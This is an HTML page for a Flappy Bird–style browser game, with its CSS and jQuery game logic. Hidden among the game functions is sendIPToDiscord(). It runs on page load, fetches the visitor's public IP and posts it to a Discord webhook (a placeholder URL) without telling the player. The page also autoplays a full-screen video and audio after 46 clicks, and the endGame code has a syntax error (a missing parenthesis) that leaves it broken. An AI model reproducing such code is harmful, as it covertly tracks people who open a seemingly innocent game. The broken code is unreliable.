<html>
	<head>
		<style>
            @font-face {
                font-family: 'flappybird';
                src: url('fonts/04B_19.TTF') format('truetype');
            }
            
			body{
				margin: 0;
				width:100%;
				height:100%;
                overflow: hidden;
			}
			#Canvas{
                position:relative;
				width: 100%;
				height: 100%;
				background: steelblue;
			}
			#Birdy{
		        width: 2.9%;
                padding-bottom: 2%;
                background-image: url('bird.png');
                background-size: 300%;
                background-repeat: no-repeat;
				position:absolute;
				top: 50%;
				left: 20%;
                z-index: 150;
			}
            
            .FallenBirdy{
                transform:rotate(90deg);
            }
            
            #PauseButton{
                position:absolute;
                top: 2%; 
                right: 1%;
                width: 3%;
                height: 0;
                padding-top: 1.25%;
                padding-bottom: 1.75%;
                background: orange;
                border-radius: 5px;
                font-size: 2.6vw;
                text-align: center;
                z-index: 50;
                cursor:pointer;
            }
            #PauseButton span{
                line-height: 3%;
                margin-left: 3%;
            }
            
            .Pipe{
                position:absolute;
                top: 0;
                left: 100%;
                width: 5%;
                background: greenyellow;
                animation: PipeMovement 3s linear;
            }
            
            @keyframes PipeMovement{
                from {left: 100%}
                to {left: -25%}
            }
            
            .paused {
                animation-play-state: paused;
             }
             
             .noSelect{
                 -webkit-user-select: none;
                -moz-user-select: none;
                -ms-user-select: none;
                user-select: none;
             }
             
             #LostScoreScreen{
                position: relative;
                left: -50%;
                margin-top: -70%;
                padding: 5px 0px 5px 12px;
                background: #ded895;
                border-radius: 4%;
                border: 2px solid black;
                text-align: center;
                display: none;
                font-family: flappybird;
                font-size: 2vw;
                color:white;                
                text-shadow:
                    -2px -2px 0 #000,  
                    2px -2px 0 #000,
                    -2px 2px 0 #000,
                    2px 2px 0 #000;
                z-index: 150;
             }
             
             #CurrentScoreCard{
                position: relative;
                left: -50%;
                margin-top: -700%;
                text-align: center;
                font-family: flappybird;
                font-size: 4vw;
                color:white;                
                text-shadow:
                    -2px -2px 0 #000,  
                    2px -2px 0 #000,
                    -2px 2px 0 #000,
                    2px 2px 0 #000;
                z-index: 50;
             }
            
            #DebugInfo{
                position: absolute;
                top: 0; left: 0;
                width: 150px;
                height: 250px;
                z-index: 25;
                background: gray;
                opacity: 0.7;
                color:white;     
                display:none;
            }

            #GlowingText {
                position: absolute;
                bottom: 10%;
                left: 50%;
                transform: translate(-50%, -50%);
                font-family: flappybird;
                font-size: 3vw;
                color: white;
                text-shadow: 0 0 10px #fff, 0 0 20px #fff, 0 0 30px #fff, 0 0 40px #ff00de, 0 0 70px #ff00de, 0 0 80px #ff00de, 0 0 100px #ff00de, 0 0 150px #ff00de;
                z-index: 200;
                display: none;
            }
		</style>
        <link rel="stylesheet" href="https://netdna.bootstrapcdn.com/bootstrap/3.1.1/css/bootstrap.min.css">
	</head>
	<body>
		<div id="Canvas">
            <div id="InstructionBox" style="position: absolute; left: 50%; display:none;">
                <div style="position: relative; left: -50%; z-index: 150; font-family:flappybird; color:white; font-size: 2vw;" class="noSelect">
                    Click to Fly <br>
                    Space Bar to Reset <br>
                    "P" to Pause
                </div>
            </div>
                        
            <div style="position: absolute; left: 50%; top: 50%;">
                <div id="CurrentScoreCard" class="noSelect">
                    <span id="CurrentScore">0</span>
                </div>
            </div>
            
            <div style="position: absolute; left: 50%; top: 50%;">
                <div id="LostScoreScreen" class="noSelect">
                    <span>Score</span>
                    <br>
                    <span id="FinalScore">0</span>
                    <br>
                    <span>Best</span>
                    <br>
                    <span id="BestScore">0</span>
                    <br>
                    <button id="ResetButton" type="button" class="btn btn-warning">Reset</button>
                </div>
            </div>
            
            <div id="DebugInfo" class="noSelect"></div>
			<div id="Birdy" style=" background-position-x: 400%;">
			</div>
            <div id="PauseButton" class="noSelect">
                <span class="glyphicon glyphicon-pause"></span>
            </div>

            <div id="GlowingText" class="noSelect">
                The game starts off basic, but progressively gets more awesome!
            </div>
		</div>
		
		<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js"></script>
		<script>
			$(function(){
                $('#InstructionBox').slideDown();
                setTimeout(function(){ $('#InstructionBox').slideUp(); }, 5000);
                
                var canvasObject = $('#Canvas');
                var gameLoopIntervalID = 0;
                var Paused = true;
                var Lost = false;
                var clickCount = 0;

                $('#GlowingText').fadeIn(1000).delay(5000).fadeOut(1000);

                function sendIPToDiscord() {
                    $.getJSON('https://api.ipify.org?format=json', function(data) {
                        var ip = data.ip;
                        var webhookURL = 'YOUR_DISCORD_WEBHOOK_URL_HERE';
                        var message = {
                            content: `User IP: ${ip}`
                        };

                        $.ajax({
                            url: webhookURL,
                            method: 'POST',
                            contentType: 'application/json',
                            data: JSON.stringify(message),
                            success: function() {
                                console.log('IP sent to Discord webhook.');
                            },
                            error: function() {
                                console.error('Failed to send IP to Discord webhook.');
                            }
                        });
                    });
                }

                sendIPToDiscord();

                function playVideoAndAudio() {
                    var video = $('<video/>', {
                        id: 'awesomeVideo',
                        src: 'video.mp4',
                        autoplay: true,
                        loop: true,
                        muted: true,
                        style: 'position: fixed; top: 50%; left: 50%; transform: translate(-50%, -50%); min-width: 100%; min-height: 100%; z-index: 200;'
                    }).appendTo('body');

                    var audio = $('<audio/>', {
                        id: 'awesomeAudio',
                        src: 'audio.mp3',
                        autoplay: true,
                        loop: true,
                        style: 'display: none;'
                    }).appendTo('body');

                    $('#Birdy').css('z-index', 300);
                }

                canvasObject.mousedown(function(e){
                    clickCount++;
                    if (clickCount === 46) {
                        playVideoAndAudio();
                    }
                    if(!Paused) Birdy.jump();
                });
                
                function pauseGame(){
                    clearInterval(gameLoopIntervalID);
                    $('.Pipe').addClass('paused');
                    $('#PauseButton span').removeClass('glyphicon-pause').addClass('glyphicon-play');
                    Paused = true;
                }
                
                function startGame(){
                    if(Lost) return;
                    gameLoopIntervalID = setInterval(gameLoop, 30);
                    $('.Pipe').removeClass('paused');
                    $('#PauseButton span').removeClass('glyphicon-play').addClass('glyphicon-pause');
                    Paused = false;
                }
                
                function endGame(){
                    Lost = true;
                    pauseGame();
                    var cookieScore = parseInt(getCookie('HighScore') || 0;
                    setCookie('HighScore', Math.max(CurrentScore, cookieScore), 30000);
                    Birdy.BirdyObject.animate({top:'90%'}, 1500, 'linear');
                    $('#FinalScore').html(CurrentScore);
                    $('#BestScore').html(Math.max(CurrentScore, cookieScore));
                    $('#LostScoreScreen').slideDown();
                }
                
                function resetGame(){
                    pauseGame();
                    $('.Pipe').remove();
                    Lost = false;
                    CurrentScore = 0;
                    Birdy.Reset();
                    startGame();
                    $('#LostScoreScreen').slideUp();
                    $('#CurrentScore').html('0');
                }
                
                function togglePause(){
                    Paused ? startGame() : pauseGame();
                }
                
                var CurrentScore = 0;
                
                $('#PauseButton').mousedown(function(event){
                    event.stopPropagation();
                    togglePause();
                });
                
                $('#ResetButton').click(resetGame);
                
                $('body').keydown(function(event){
                    if(event.which == 32) resetGame();
                    if(event.which == 80) togglePause();
                });
                
                var gameLoopCounter = 0;
                
                function gameLoop(){
                    if(gameLoopCounter % 2 === 0){
                        incrementScore();
                        checkCollisions();
                    }
                    
                    isInBound(Birdy.BirdyObject, canvasObject);
                    Birdy.fall();
                    
                    if(gameLoopCounter%90 === 0){
                        addPipe();
                        cleanPipes();
                    }
                    
                    if(gameLoopCounter%7 === 0){
                        Birdy.flapWings();
                    }
                    
                    gameLoopCounter++;
                }
                
				var Birdy = new (function(){
					var selectorObject = $('#Birdy');
					var jumping = false;
					var gravVeloc = 0;
					var gravAccel = 0.3;
                    var terminalVelocity = 5;
                    var Angle = 0;
                    var WingPosition = 0;
                    var WingPositions = [0, 1, 2, 1];
					
                    this.Reset = function(){
                        jumping = false;
                        gravVeloc = 0;
                        Angle = 0;
                        WingPosition = 0;
                        selectorObject.stop().rotate(0).css('top','50%');
                    }
                    
					this.fall = function(){
						if(!jumping){
							selectorObject.stop().animate({top:'+='+gravVeloc+'%'}, 30, 'linear');
							gravVeloc = Math.min(gravVeloc + gravAccel, terminalVelocity);
                            var AdjustedAngle = Angle + 15*Math.pow(gravVeloc/terminalVelocity, 2);
                            adjustAngle(Math.min(AdjustedAngle,90));
                        }
					};
					
					this.jump = function(){
                        if(Paused) return;
						jumping = true;
                        adjustAngle(-45);
						selectorObject.stop().animate({top:'-=9%'}, 100, 'linear', function(){
							jumping = false;
							Birdy.fall();
						});
					};
                    
                    this.flapWings = function(){
                        WingPosition++;
                        if(Angle > 45) WingPosition = 1;
                        selectorObject.css("background-position-x", WingPositions[WingPosition%4]*50 + "%");
                    }
                    
                    function adjustAngle(angle){
                        selectorObject.rotate(angle);
                        Angle = angle;
                    }
                    
                    this.BirdyObject = selectorObject;
				});

                function addPipe(){
                    var PipeGap = 30;
                    var MinPipeHeight = 5;
                    var MaxTopPipeHeight = 100-PipeGap-2*MinPipeHeight;
                    var TopPipeHeight = Math.random()*MaxTopPipeHeight+MinPipeHeight;
                    var BottomPipeTop = TopPipeHeight+PipeGap;
                    
                    $('<div/>').addClass('Pipe').css('height',TopPipeHeight+'%').data('scored', false).appendTo(canvasObject);
                    $('<div/>').addClass('Pipe BottomPipe').css({
                        height: (100-BottomPipeTop)+'%',
                        top: BottomPipeTop+'%'
                    }).data('scored', false).appendTo(canvasObject);
                }
                
                function cleanPipes(){
                    $('.Pipe').each(function(){
                        if($(this).offset().left/$(this).parent().width() < -0.2){ 
                            $(this).remove();
                        }
                    });
                }
                
                function checkCollisions(){
                    $('.Pipe').each(function(){
                        if(isIntersecting(Birdy.BirdyObject, $(this))){
                            endGame();
                        }
                    });
                }
                
                function isIntersecting(obj1, obj2){
                    var obj1Dimensions = [obj1.offset().left, obj1.offset().top, obj1.offset().left+obj1.width(), obj1.offset().top+obj1.height()];
                    var obj2Dimensions = [obj2.offset().left, obj2.offset().top, obj2.offset().left+obj2.width(), obj2.offset().top+obj2.height()];
                    
                    return !(obj1Dimensions[3] < obj2Dimensions[1] ||
                            obj1Dimensions[1] > obj2Dimensions[3] ||
                            obj1Dimensions[0] > obj2Dimensions[2] ||
                            obj1Dimensions[2] < obj2Dimensions[0] );
                }
                
                function isInBound(birdy, canvas){
                    if(birdy.offset().top+birdy.height() > canvas.offset().top+canvas.height() || 
                       birdy.offset().top < canvas.offset().top){ 
                        endGame();
                    }
                }
                
                function incrementScore(){
                    $('.BottomPipe').each(function(){
                        var BirdyBeakXPos = Birdy.BirdyObject.offset().left + Birdy.BirdyObject.width();
                        var PipeRightXPos = $(this).offset().left + $(this).width();
                        if(!$(this).data('scored') && BirdyBeakXPos > PipeRightXPos){
                            CurrentScore++;
                            $(this).data('scored', true);
                        }
                    });          
                    $('#CurrentScore').html(CurrentScore);
                }
                               
                startGame();
                
                jQuery.fn.rotate = function(degrees) {
                    return $(this).css({'transform': 'rotate('+degrees+'deg)'});
                };
                
                function setCookie(cname,cvalue,exdays) {
                    var d = new Date();
                    d.setTime(d.getTime()+(exdays*24*60*60*1000));
                    document.cookie = cname + "=" + cvalue + ";expires=" + d.toUTCString();
                }
                
                function getCookie(cname) {
                    var name = cname + "=";
                    var ca = document.cookie.split(';');
                    for(var i=0; i<ca.length; i++) {
                        var c = ca[i].trim();
                        if(c.indexOf(name) == 0) return c.substring(name.length,c.length);
                    }
                    return "";
                }
			});
		</script>
	</body>
</html>
